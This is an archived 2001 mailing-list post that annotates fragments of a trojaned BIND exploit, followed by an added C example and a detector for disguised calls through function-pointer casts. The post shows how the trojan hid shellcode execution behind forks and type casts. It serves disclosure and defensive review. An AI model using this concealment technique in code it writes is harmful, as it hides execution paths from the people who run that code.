offending code of bind trojan


Date: Thu, 1 Feb 2001 01:03:31 -0800
From: Perry Harrington <[email protected]>
To: [email protected]
Subject: offending code of bind trojan

Below I have excerpted the obvious pieces of the trojan.  The functions
which do the deed are set_ptr, and the call to dnsprintflabel.

I just thought some people may have wanted to know how the person who
wrote the trojan hid the shellcode among the seemingly correct exploit.

--Perry

***
*** set_ptr does the fork dance.
***

int
set_ptr(char *buff, int offset, unsigned long val, int s)
{

		if (!fork())

***
*** After the above fork, child does meaningless memcpy and
*** returns to main, causing multiple executions of the trojan
*** shellcode.
***

	memcpy(buff, copy_buff, sizeof(copy_buff));
	return 0;
}

***
*** dnsprintflabel has a lot of crap code in it, but it
*** isn't this function that does the deed, it's the
*** arguments to the function.
***

/* pull out a compressed query name */
char           *
dnsprintflabel(char *s, char *buf, char *p)
{
	return (p);
}


***
*** This is the actual code that does the running of the shellcode.
*** In it he hides a lot of useless casts to hide the inline prototype
*** of the call to the shellcode.
***

	/*
	 * encode packet ...
	 */
	dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),
		 (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
                 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

                 This is the carefully typecasted prototype for the shellcode; he
                 just skips all the header and pointer crap to actually run the
                 shellcode.  The &expl_buffer[0] + sizeof(HEADER) + 1 is actually
                 just the shellcode he copied from the buffers above, hidden behind
                 some custom types and stuff.

                 EXPLANATION: The & dereference just returns the pointer of the array
                 element at the calculated offset (sizeof(HEADER) + 1).  The thing that
                 gives this away as a function call is the extra set of parentheses
                 after the typecast; this is the lexicon for an inline function typecast.


--
Perry Harrington                 Director of                   zelur xuniL  ()
[email protected]             System Architecture               Think Blue.  /\

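Added example, not part of Perry's message and not code from the trojan: the two cast shapes his explanation contrasts, written out as compilable C. A plain (char *)(...) cast, like the third argument to dnsprintflabel, only computes an address; control is transferred only when the address is cast to a function-pointer type and the cast is followed by a call operator, the ((T (*)(args))addr)(...) form or the older (*(T (*)())addr)() form. A real C function stands in for the shellcode so the program runs on any architecture, and has_call_through_cast is a line-level check for that "extra set of parentheses" shape that a reviewer can run over a suspect exploit before compiling it. The sample lines are constructed for the demo; stand_in_shellcode, fired, pointer_cast_offset, count_suspicious and the other names are hypothetical.

```c
/*
 * Added example, not from the post or the trojan.  Contrasts a pointer
 * cast (no control transfer) with a call through a function-pointer
 * cast, and flags the latter shape in source lines.  All names are
 * hypothetical; the sample lines are constructed for the demo.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int fired = 0;   /* how many times the stand-in "shellcode" ran */

/* Stand-in for shellcode: a real function whose address is treated as an
 * opaque number, so the demo runs on any architecture.  A trojan would
 * instead point at bytes it had copied into a char array. */
static int stand_in_shellcode(void)
{
    fired++;
    return 0x41;
}

/* Shape 1, as in the dnsprintflabel argument:
 *   (char *)((unsigned long)&buf[0] + off)
 * This only computes an address.  Nothing at that address executes. */
static char *pointer_cast_only(char *buf, size_t off)
{
    return (char *)((uintptr_t)&buf[0] + off);
}

/* Distance the pointer cast moved from the buffer start (for checking). */
ptrdiff_t pointer_cast_offset(size_t off)
{
    char buf[64] = {0};
    return pointer_cast_only(buf, off) - buf;
}

/* Shape 2: the same kind of address cast to a function-pointer type and
 * then called.  The "()" after the closing parenthesis of the cast is
 * what turns the expression into a jump to the bytes at addr. */
int call_through_cast(uintptr_t addr)
{
    int (*fn)(void) = (int (*)(void))addr;
    return fn();
}

/* Review aid: flag a line containing the shape  ((T (*)(args))expr)(...)
 * or  (*(T (*)(args))expr)(...), i.e. a function-pointer cast whose
 * enclosing parenthesis is immediately followed by a call operator.
 * A bare cast such as  (T (*)(args))expr  or a declaration such as
 * int (*fn)(void) is not flagged.  Returns 1 if suspicious, else 0. */
int has_call_through_cast(const char *line)
{
    int depth = 0;                       /* paren nesting before position i */
    for (size_t i = 0; line[i]; i++) {
        if (line[i] == ')') { depth--; continue; }
        if (line[i] != '(') continue;
        /* "(*)" marks a function-pointer type; the cast's own '(' plus one
         * wrapping '(' must already be open, hence depth >= 2 */
        if (depth >= 2 && strncmp(&line[i], "(*)", 3) == 0) {
            int d = depth;
            for (size_t j = i; line[j]; j++) {
                if (line[j] == '(') d++;
                else if (line[j] == ')') d--;
                if (d == depth - 2) {    /* the wrapping ')' just closed */
                    size_t k = j + 1;
                    while (line[k] == ' ' || line[k] == '\t') k++;
                    if (line[k] == '(') return 1;
                    break;
                }
            }
        }
        depth++;
    }
    return 0;
}

/* Constructed sample lines: the two pointer casts from the post, a plain
 * declaration, and two disguised calls through a cast. */
static const char *const sample_lines[] = {
    "dnsprintflabel(remote_addr, (char *) (expl_buffer + sizeof(HEADER)),",
    "    (char *) ((unsigned long) &expl_buffer[0] + sizeof(HEADER) + 1));",
    "int (*fn)(void) = (int (*)(void))(uintptr_t)addr;",
    "((void (*)(void))((unsigned long)&expl_buffer[0] + sizeof(HEADER) + 1))();",
    "(*(void (*)(void))(expl_buffer + sizeof(HEADER) + 1))();",
};

int count_suspicious(void)
{
    int n = 0;
    for (size_t i = 0; i < sizeof sample_lines / sizeof sample_lines[0]; i++)
        n += has_call_through_cast(sample_lines[i]);
    return n;
}

int main(void)
{
    int r = call_through_cast((uintptr_t)stand_in_shellcode);
    printf("call through cast returned 0x%x, shellcode fired %d time(s)\n", r, fired);
    printf("pointer cast moved %ld bytes and executed nothing\n", (long)pointer_cast_offset(3));
    printf("%d of %d sample lines call through a cast\n", count_suspicious(),
           (int)(sizeof sample_lines / sizeof sample_lines[0]));
    return 0;
}
```

The check is deliberately narrow: it only recognises a function-pointer cast whose wrapping parenthesis is followed by a call, which is the one shape that executes the pointed-to bytes, so a cast that merely stores a function pointer or a cast of a call's result is left alone. Run it over every line of a downloaded exploit before building; an unexplained hit inside packet-encoding code is worth reading by hand.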
